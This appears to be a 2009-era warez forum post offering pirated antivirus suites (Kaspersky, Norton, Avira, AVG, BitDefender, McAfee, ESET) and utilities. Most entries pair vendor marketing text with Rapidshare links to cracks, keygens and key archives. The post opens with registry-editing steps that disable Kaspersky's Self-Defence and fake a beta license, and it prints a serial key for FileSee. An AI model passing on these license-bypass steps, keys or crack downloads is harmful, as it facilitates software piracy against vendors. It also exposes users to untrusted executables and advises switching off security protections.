The Manual MethodOnly use this method if the patch doesn't work.1. Download and install Kaspersky (Activate with a Trial License)2. Go to Kaspersky's settings, click Options, and untick Enable Self-Defence3. Exit Kaspersky4. Go to Start, run, then type regedit and press enter5. Press CTRL+F and type in ProductStatus and hit enter6. Double click ProductStatus and change Release to Beta (it may say Trial instead of Release)7. Press OK then open Kaspersky.8. Tick Activate beta license then press Next and Finish9. Re-enable Self-Defence.10. Every 30 days Kaspersky will ask for a license, simply click Activate Beta and boom you're good to go SmileIf it still doesn't work, some users found re-installing the application worked, or removing the existing license key allowed the patch to work.

    
Norton Antivirus 2009 + Trial Reset (Full Version) 

Use this anitivirus to protect your PC from latest threats, worms , key loggers , Trojan's etc.It updates regularly(in fact daily) so that you have always the updated antivirus database.Key Benefits* Stops viruses, worms, spyware, bots, and more—Keeps your system protected against all types of malicious threats.* Norton™ Insight—Delivers innovative intelligence-driven technology for faster, fewer, shorter scans.* NEW! Rapid pulse updates every 5 to 15 minutes—provides up-to-the-minute protection.* Prevents virus-infected emails and instant messages from spreading—Feel secure while you keep in touch.* Blocks browser exploits and protects against infected Web sites—Surf the Internet with confidence.FeaturesEngineered for Speed* NEW! Scans only files and processes at risk using Norton™ Insight.* NEW! Installs in under one minute on average, requires less than 8 MB of memory.** [More Info]Up-to-the-minute Protection* NEW! Delivers up-to-the-minute protection with rapid pulse updates every 5 to 15 minutes.* IMPROVED! Provides multilayered security through the Norton™ Protection System.* NEW! Prevents bots from taking control of your PC.* Detects and automatically removes malicious threats.* IMPROVED! Defends against Web-based attacks.* Automatically detects and removes spyware, viruses, Trojans, bots and Internet worms.* NEW! Recovery tool boots and repairs badly infected PCs.* [More Info]* NEW! Delivers our most complete, deep cleaning scan possible.* Norton Ongoing Protection provides continuous protection updates and new product features as they become availablethroughout your product subscription period, helping to keep your computer protected against the latest Internetthreats and risks.* Norton Automatic Renewal Service helps to ensure that you’re protected by automatically renewing your productsubscription before it expires. [More Info]Control without disruptions* NEW! Automatically schedules scans and updates to occur while PC is idle.* NEW! Review the security status of every process on your PC.* NEW! Silent mode helps ensures movies and games are never interrupted.* Maps your wireless home network.Free Technical Support* NEW! Tech support without charge from Symantec delivers help however you need it.***

Download File : -
ttp://rapidshare.com/files/264882978/Norton_Antivirus_09.zip
Installation1. Extract the .rar files.2. Install the application.3. Use the crack Provided .4. Enjoy.

Avira and avg premium versionAvira AntiVir Premium 9.0.0.446 34.28 

MbThe Avira AntiVir Premium application was designed to be a comprehensive and flexible tool you can rely on to protect your computer from viruses, malware, unwanted programs, and other dangers.In a user-defined installation or a modification installation, the following installation modules can be selected, added or removed.AntiVir PremiumThis module contains all components required for successful installation of Avira AntiVir Premium.AntiVir GuardThe AntiVir Guard runs in the background. It monitors and repairs, where necessary, files during operations such as open, write and copy in on-access mode. Whenever a user carries out a file operation (e.g. load document, execute, copy), Avira AntiVir Premium automatically scans the file. Renaming a file does not trigger a scan by AntiVir Guard.AntiVir MailGuardMailGuard is the interface between your computer and the email server from which your email program (mail client) downloads the emails. MailGuard is connected as a so-called proxy between the email program and the email server. All incoming emails are routed through this proxy, scanned for viruses and unwanted programs and forwarded to your email program. Depending on the configuration, the program processes the affected emails automatically or asks the user for a certain action.AntiVir WebGuardWhen surfing the internet, you are using your web browser to request data from a web server. The data transferred from the web server (HTML files, script and image files, Flash files, video and music streams, etc) will normally be moved directly into the browser cache for display in the web browser, meaning that an on-access scan as performed by AntiVir Guard is not possible. This could allow viruses and unwanted programs to access your computer system. WebGuard is what is known as an HTTP proxy which monitors the ports used for data transfer (80, 8080, 3128) and scans the transferred data for viruses and unwanted programs. Depending on the configuration, the program may process the affected files automatically or prompt the user for a specific action.Rootkit DetectionThe Rootkit Detection checks whether software is already installed on your computer that can no longer be detected with conventional methods of malware protection after penetrating the computer system.Shell ExtensionThe Avira AntiVir Premium Shell Extension generates an entry Scan selected files with AntiVir in the context menu of the Windows Explorer (right-hand mouse button). With this entry you can directly scan files or directories.Here are some key features of "Avira AntiVir Premium":· Control Center for monitoring, administering and controlling the entire program· Central configuration with user-friendly standard and advanced options and context-sensitive help· Scanner (On-Demand Scan) with profile-controlled and configurable search for all known types of virus and malware· Integration into the Windows Vista User Account Control allows you to carry out tasks requiring administrator rights· Guard (On-Access Scan) for continuous monitoring of all file access attempts· MailGuard (POP3 scanner and SMTP scanner) for the permanent checking of emails for viruses and malware. Checking of email attachments is included· WebGuard for monitoring data and files transferred from the Internet using the HTTP protocol (monitoring of ports 80, 8080, 3128)· Integrated quarantine management to isolate and process suspicious files· Rootkit protection for detecting hidden malware installed in your computer system (rootkits)· (Only for 32-bit systems)· Direct access to detailed information on the detected viruses and malware via the Internet· Simple and quick updates to the program, virus definitions, and search engine through Single File Update and incremental VDF updates via a webserver on the Internet· User-friendly licensing in License Manager· Integrated Scheduler to plan one-off or recurring tasks, such as updates or test runs· Extremely high virus and malware detection via innovative scanning technology (scan engine) including heuristic scanning method· Detection of all conventional archive types including detection of nested archives and smart extension detection· High-performance multithreading function (simultaneous high-speed scanning of multiple files)Requirements:· Computer: Pentium or higher, at least 133 MHz· RAM: 192 MB / 512 MB RAM for Windows Vista· 40 MB free memory on the hard disk (more if quarantine is used)· 100 MB temporary memory on the hard disk· Administrator rights are required for the installation

Download File : -
http://rapidshare.com/files/264153705/Avira_AntiVir_Premium_9.0.0.446.zipkeys

Download File : -
http://rapidshare.com/files/264883179/Keys.rar

Avg internet security 8.5.387 till 2018Antivirus with full updates 

first timeThe World's oldest and most trusted antivirus is AVG.THe latest version of AVG is "AVG Internet Security 8.5.387 .The liscense will expire on 2018
This image has been resized. Click this bar to view the full image. The original image is sized 1024x693.Description:Anti-Virus, Anti-Spyware, Anti-Spam, LinkScanner & Firewall. Comprehensive protection for your computer! This award-winning product gives you unbeatable Internet security by protecting against viruses, spyware, hackers, spam and malicious websites. AVG Internet Security is a reliable and easy-to-use solution for home and small office users which is trusted by millions of users worldwide. Unique Internet security thanks to new technology - Only AVG gives you real-time protection against malicious websites thanks to our new LinkScanner technology. Comprehensive protection for Windows against all online threats from the world's most trusted security company. Use the Internet with confidence in your home or small office.- Easy to download, install and use- Protection against all Internet threats- Real-time security while you surf and chat online- Top-quality protection that does not slow your system down- Free support and service around the clock and across the globe- Compatible with Windows Vista and Windows XPFEATURES:All-in-one protection* Anti-Virus: protection against viruses, worms and trojans* Anti-Spyware: protection against spyware, adware and identity-theft* Anti-Rootkit: protection against hidden threats (rootkits)* Anti-Spam: filters out unwanted and fraudulent e-mails (anti-phishing)* Web Shield & LinkScanner: protection against malicious websites* Firewall: protection against hackers* System Tools: for easy system managementEasy-to-use, automated protectionReal-time protection, automatic updates, low-impact background scanning for online threats, and instant quarantining or removal of infected files ensures maximum protection. Every interaction between your computer and the Internet is monitored, so nothing can get onto your system without your knowledge. AVG scans in real time:* All files including documents, pictures and applications* E-mails (all major email programs like MS Outlook and Thunderbird supported)* Instant messaging and P2P communications* File downloads and online transactions such as shopping and banking* Search results and any other links you click onAVG checks in real time:* All files including documents, photos, music, and applications* E-mails (all major email programs like Microsoft Outlook and Thunderbird supported)* Instant messaging and P2P communications* File downloads and online transactions such as shopping and banking* Search results and any other web links you click onInternet Security – prevention is better than cureAVG Internet Security provides multiple layers of protection to ensure nothing slips through.NEW Identity Theft Protection prevents new and unknown threats from stealing your personal information like bank and credit card details.LinkScanner checks every link, making sure you're safe searching the internet and surfing the web, minimizing the risk of you accidentally visiting a poisoned web page.Web Shield detects and blocks malware threats in file downloads and instant-messaging conversations.The Firewall stops hackers from accessing and misusing your computer.Antivirus, Anti-Spyware, and Anti-Rootkit detect and root out all manner of malicious software, no matter how stealthy it may be.You didn't buy your computer to worry about security. So let AVG Internet Security do the worrying for you while you get on with your online life.Tailor AVG just for youAVG's System Tools let you easily configure your privacy settings, connections, and browser plug-ins all in one place.The best Windows protection - trusted by millions of usersAVG's award-winning antivirus technology protects more than 80 million users and is certified by major antivirus testing organizations (VB100%, ICSA, West Coast Labs Checkmark). View all AVG awards & certificationsNo hidden costsWhen you purchase an AVG product, everything you need is included in the price for the full license duration - technical support, virus updates, and new program versions. All users of paid AVG products also qualify for generous discounts on subscription renewals and product upgrades.Flexible licensing* AVG Internet Security can be purchased online in license packs for 1-10 computers.* One or two year subscriptions available.OS: Windows 2000/XP/Vista

Download File : -
http://rapidshare.com/files/246475906/avg.zip

           BitDefender Total Security 2009Proactive protection 

against viruses, spyware, hackers, spamBitDefender Total Security 2009 application was designed to provide comprehensive proactive protection against viruses, spyware, hackers, spam and other Internet security threats, along with system maintenance and data backup.BitDefender Total Security 2009 provides the ultimate proactive protection for your PCs. It combines state of the art protection against viruses, spyware, hackers, spam and other Internet security threats. Moreover, its system maintenance and PC backup tools keep your PC running fast and protected from data loss.Features:ANTIVIRUS & ANTISPYWARE· Protects your PC in real time against known viruses, spyware and other malware· Blocks unknown viruses using advanced proactive detection techniques· Detects and removes hidden threats (rootkits)· Provides a smooth gaming experience by reducing the system load to a minimum· Monitors and prevents potential spyware threats in real-timeANTI-PHISHING· Protects against phishing attempts by filtering all accessed web pages· Reduces the risk of identity theft by preventing personal information leaks via e-mail or web.FIREWALL· Controls the access of applications to the Internet while “hiding” your computer from hackers with the stealth mode setting· Helps prevent unauthorized access to the Wi-Fi internet connection by notifying you about computers that log in to the networkANTISPAM· Responds faster to new spamming techniques with new adaptive engines· Prevents different types of scam e-mails from reaching your InboxPARENTAL CONTROL· Blocks access to inappropriate web content and e-mail· Allows or blocks web access during specified intervalsBACKUP· Safeguards your data by creating backup copies to local and removable drives, CD-R/RW or DVD-R/RW· Automatically backs up only new files, based on a pre-set schedule.TUNE-UP· Improves PC operation by removing unnecessary files and registry entries· Completely erases files and "traces" of files from disk to prevent recovery

Download File : -
http://rapidshare.com/files/253592005/bitdefender_totalsecurity_2009_32b.exekeygen for all versions

Download File : -
:http://rapidshare.com/files/240934024/keygen_for_bitdefender_2009-_for_all.rar

                       BitDefender Internet Security 2009A software 

application that offers complete protection from Internet threatsBitDefender Internet Security 2009 was designed to keep your Internet-connected family safe, without slowing down their PCs. It locks out viruses, hackers & spam, while providing parental control and firewall protection.Superior Proactive Protection from Viruses, Spyware, Hackers, and other e-Threats that wont slow you down!BitDefender provides security solutions to satisfy the protection requirements of today's computing environment, delivering effective threat management to home and corporate users. BitDefender Internet Security 2009 features antivirus, firewall, antispyware, privacy control and parental control for corporate and home users. It provides comprehensive proactive protection from viruses, hackers, spyware, spam and phishing emails, and it also protects children from inappropriate websites.Features:· Confidently download, share and open files from friends, family, co-workers - and even total strangers!Improved: Scans all web, e-mail and instant messaging traffic for viruses and spyware, in real-timeProactively protects against new virus outbreaks using advanced heuristics· Protect your identity: shop, bank, listen, watch privately and securelyBlocks attempted identity theft (phishing)Improved: Prevents personal information from leaking via e-mail, web or instant messaging· Guard your conversations with top-of-the line encryptionInstant Messaging EncryptionFile Vault securely stores personal information or sensitive files· Connect securely to any network at home, in the office or awayAutomatically modifies firewall protection settings to suit locationWi-Fi monitor helps prevent unauthorized access to your Wi-Fi network· Protect your family and their computers!Blocks access to inappropriate websites and e-mailSchedules and limits kidsaccess to Internet and to applications· Play safe, play seamlessly!Improved: Reduces the system load and avoids requesting user interaction during games· Get fine-tuned performance from your computer !Uses few system resourcesLaptop mode prolongs battery life· Family network protection· Manage the security of your home network from a single location. BitDefender software from other computers in the network can be remotely configured, while tasks such as scans, backups tune-ups and updates can be run on-demand or scheduled to run during off-hours.· Hassle Free Hourly UpdatesHourly updates ensure that you are protected against the latest threats without pushing a button. Lost program files are not a problem either. In the rare event of file damage due to PC problems, BitDefender automatically repairs and updates itself.

Download File :-
http://rapidshare.com/files/253621400/bitdefender_internetsecurity_2009_32b.exe
Note:use the same keygen

         McAfee Total Protection 2009 + Proof + Updatable

This image has been resized. Click this bar to view the full image. The original image is sized 751x556.
Code:Quote:INCREDIBLE SECURITY SUITE!* FULLY UPDATABLE* NO SERIALS REQUIRED* NO PIRACY DETECTION* ONLINE REGISTRATION* PROTECTION FOR 3 COMPUTERS WHAT MORE YOU WANT????

Download File:-
http://rapidshare.com/files/264912568/antivirus_2009.zip

       Eset NOD 32 Antivirus v4.0.424 32&64 bit(with keygen)InfoFACT:

Eset NOD 32 Antivirus v4.0.424 32&64 bit(with keygen)InfoFACT: Surfing the web and using email is a part of daily life.FACT: Criminals capitalize on this to their advantage, flooding the Internet with over 100,000 new attacks every day, in an effort to steal your identity or turn your computer into a "zombie" to launch email spam and other Internet crimes.FACT: Over 70 million users worldwide trust ESET to defend themselves from these attacks.ESET NOD32 Antivirus 4 is the most effective protection you can find to combat today's huge volumes of Internet and email threats. It provides comprehensive antivirus and antispyware protection without affecting your computer's performance.Using advanced ThreatSense® technology, ESET NOD32 Antivirus proactively protects you from new attacks, even during the critical first hours when other vendors' products aren't aware the attack even exists. ESET NOD32 Antivirus detects and disables both known and unknown viruses, trojans, worms, adware, spyware, rootkits and other Internet threats.ESET NOD32 Antivirus is also one of the fastest antivirus solutions, so fast you won't even notice it running. And it's both incredibly easy to use yet simple to tailor for your specific needs.Key BenefitsProtection from the Unknown — Award-winning ThreatSense technology uses multiple layers of threat detection to deliver the most effective protection possible against new attacks. And ThreatSense is smart; it raises far fewer annoying "false alarms" than any other products that use heuristics.Finds Malware Other AV Companies Missed — Typically when a new copy of ESET NOD32 replaces another antivirus product on a home computer the average user finds viruses or malware resident on the machine that were undetected by their previous antivirus product.Built for Speed — ESET NOD32 Antivirus is lightning fast, so fast you won't even notice it's there. Even disk-intensive operations like performing a "full disk scan" to run smoothly in the background while you work or play.Easy on Your System — ESET NOD32 Antivirus is "lean and mean," typically using just 44 MB of memory, a fraction of what other products consume. Because it's fast and "light," upgrading your existing antivirus protection to ESET NOD32 Antivirus can literally be like buying a new computer. And the new automatic energy-sipping battery mode lets you work or play longer.Easy on You — ESET NOD32 Antivirus is easier to use than ever before. From its compact and intuitive user interface to its minimal use of alerts, you'll be up and running in a snap.You will receive the best possible proactive detection against malware, without enduring excessive system slowdowns and alerts, reboots or annoying false alarms.What's NewSmarter Scanner — Threats don't always enter your network in ways you expect. ESET NOD32 Antivirus inspects SSL-encrypted communication channels like HTTPS and POP3S and intelligently scans compressed files to find hidden threats other products miss. Proactive protection begins at the earliest point in system startup to ensure your computer is always secure.Clean and Safe Email — Email scanning for Microsoft Outlook, Outlook Express, Mozilla Thunderbird, Windows Live Mail, Windows Mail, and other POP3/IMAP mail clients, ensuring your email is free of viruses and other threats.Removable Media Security — Threats can enter your PC from removable media such as USB thumb drives. For self-running media, ESET NOD32 Antivirus scans autorun.inf and associated files when the medium is inserted, in addition to scanning any file on any removable device when it is accessed, or during a full-scan of the media. Power users can adjust ESET NOD32 Antivirus to perform additional levels of scanning on removable media.System Tools — ESET SysInspector and ESET SysRescue simplify diagnosing and cleaning of infected systems by allowing deep scans of system processes to find hidden threats, and creating bootable rescue CD/DVD or USB drives to help you repair an infected computer.Self Defense — ESET NOD32 Antivirus has built-in technology to prevent malicious software from corrupting or disabling it, so you can rest assured your system is always protected.Many Usability Improvements — ESET NOD32 Antivirus has numerous speed, security and usability upgrades.Energy-sipping battery mode extends laptop battery life without compromising securityAdvanced Protection Status screen informs you of threat detectionsInformation pop-ups are hidden when running full screen applications like games, video players or presentationsPassword protection prevents ESET NOD32 Antivirus from being uninstalled by strangersNew interface and keyboard shortcuts simplify use for visually impaired usersSystem RequirementsProcessors supported: Intel or AMD x86/x64Operating Systems: Microsoft Windows 2000, Microsoft Windows XP (32¬ and 64-bit editions), Microsoft Windows Vista (32- and 64-bit editions)Memory: 44 MB

Download File:-
http://rapidshare.com/files/265263246/esnet_nod32_32_64bit_.ziphttp://rapidshare.com/files/265263513/NOD_20Crack.rar

File See 6.6

                                                         File See 6.6



FileSee is a powerful All-In-One file viewer. It is a tool that helps you to view files quickly. FileSee is a combination of a file manager, a text file viewer, an image viewer, a pdf viewer, a flash player, a video player, a mp3 player, a midi player, a hex file editor, a html viewer, a zip file decompresser, a filename batch renamer and manager, a desktop searching engine, a dll viewer, a wav to mp3 converter, a pdf text extractor.... So, FileSee is an All-In-One file viewer and a powerful file manager! FileSee's interface is similar to Windows Explorer.
Supported file types
txt, html, htm, mht, shtml, shtm, pdf, swf, jpg, jpeg, gif, tif, tiff, bmp, png, ico, wmf, wmf, tga, pcx, wbmp, jp2, jpc, pgx, pnm, ras, j2k, psd, midi, mid, mp3, wav, avi, mpg, mpeg, wma, wmv, asf, zip, rar, cab, gzip, jar, tar, bh, lha, zoo, ace, arc, arj, fxd, fxr, fxm, xls, xl, xlt, ppt, pps, pot, doc, dot, vsd, exe, dll, ocx, ax, rm, ram, ra, rmvb, rp, rpm, rt, wpl, wmx, wmd, wmz, wax, wvx, cda, rmi, aif, aifc, aiff, au, snd, dvr-ms, mpe, mlv, mp2, mpv2, mp2v, mpa, mov, qt , flv, etc.

Downlaod Link trail Version :- 
http://www.filesee.com/download.html

Serial Key :- THTKF-OA2KR-DUXSB-YC1IF-1CNV7

Free Port Scanner 2.8.1 - IP scanner

                                          Free Port Scanner 2.8.1 - IP scanner


















Free Port Scanner is a small, fast, easy-to-use and robust port scanner for the Win32 platform. You can scan ports on fast machines in a few seconds and can perform scan on predefined port ranges. This tool uses TCP packets to determine available hosts and open ports, service associated with port and other important characteristics. The tool is designed with a user-friendly interface and is easy to use.

Download Link :-
 http://www.nsauditor.com/network_tools/free_port_scanner.html

File Rename Tool

                                                         File Rename Tool


This program makes it easy to rename some files. You can browse to a directory.
If needed, you can enter a file mask to limit the number of files shown.
The application is especially handy to rename photo's.
You can enter a search and replace string. By pressing a button "Preview"
all files will be shown that will be renamed.
By pressing the button "Execute Rename" the action is executed.

Download Link:-
http://www.idlebackup.nl/index.php?option=com_docman&task=cat_view&gid=2&Itemid=10

Total Video Converter

                          Total Video Converter


Total Video Converter is a total solution for video conversion which supports reading, playing lots of video and audio formats and converting them to popular video formats. Total Video Converter includes a powerful media conversion engine internally so that you can convert media files with very fast speed.

Total Video Converter V3.10 New Features:

1 Photos slide show
Photos slide show turns your photos into slideshows and music with more than 300 photos special transition effect that help you easily make amazing picture-in-picture entertaining photo slideshows.Then output your video to disc, the Internet, iPod, PSP, Smartphones, PDAs and other mobile devices or even burns it to standard DVD players. Copy-saving & Watching & sharing your slideshows anywhere anytime.

2 Importing lots of subtitle file formats, including .srt . sub .ssa .ass .smi .psb .tex .idx etc;

3 Importing WINAMP plugins audio

4 Supports generating ASF,WMV(for ZUNE,XBOX360),WMA video and audio formats;

5 Supports generating Sony Ericsson mobile video formats;

6 Unique feature: Supports generating some kinds of digital camera formats,such as KODAK DC, Samsung L55W, Casio Z600;

7 Supports generating MPEG TS stream subtitle files formats ;


Main Features of Total Video Converter

* Convert all kinds of videos to mobile videos or audios (mp4, 3gp, xvid, divx mpeg4 avi, amr audio) which are used by cell-phone, PDA, PSP, iPod;
* Photos slide show combines multi-photos and musics with more than 300 photos fantasy transition effect;
* High compatibility and high efficiency for Importing RMVB or RM video/audio;
* Convert various videos to MPEG videos compatible with standard DVD/SVCD/VCD;
* Burn the converted videos to DVD/SVCD/VCD;
* Rip DVD to popular videos of all sorts;
* Extract audio from various of videos and convert which to all kinds of audios (mp3, ac3, ogg, wav, aac);
* RIP CD to audios of all sorts directly;
* Support using with command line;
* Combine several video and audio files to one video file;
* Demultiplex or extract video and audio;
* Multiplex video and audio to one file;
* Flv Nelly Mosser audio extract and decode.


Download Link:-
Portable Total Video Converter v 3.10 :-
Total Video Converter v 3.50 :-
Portable Total Video Converter 3.12